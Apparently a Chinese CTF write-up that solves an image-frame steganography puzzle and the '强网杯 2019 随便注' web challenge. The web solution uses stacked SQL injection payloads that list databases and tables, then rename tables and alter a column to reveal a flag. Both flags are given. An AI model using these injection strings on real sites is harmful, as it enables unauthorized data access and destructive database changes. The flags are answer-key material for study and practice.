MISC

金三胖

下载附件,打开后是张图片
托进Stegsolve工具中
金三胖1.png
点击图中的菜单,一帧一帧看
金三胖2.png
分别在第21、51、79帧有flag
金三胖3.png
金三胖4.png
金三胖5.png
把他们组合拼接,就得到了完整的flag
flag{he11ohongke}

WEB

[强网杯 2019]随便注

这个题目可以使用堆叠注入
堆叠注入也就是用分号隔开的两个sql语句

输入

1' or 1=1#

显示了表中的内容
随便注1.png

1';select 1,2,databases();#

想查看数据库,发现select被过滤了,union查询也就用不上了
随便注2.png

1';show databases;#

直接使用堆叠注入,直接把所有数据库爆出来了
随便注3.png

0';show tables;#

看下表
随便注4.png

0';desc `1919810931114514`;#

随便注5.png

0';desc `words`;#

再查看表的结构
随便注6.png

可以发现flag字段,可以判断出,咱们查询时候用的时word表,所以可以把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#

随便注7.png

1' or 1=1#

随便注8.png
flag{466cf51d-acbb-479a-bd3d-a62f5c690a0d}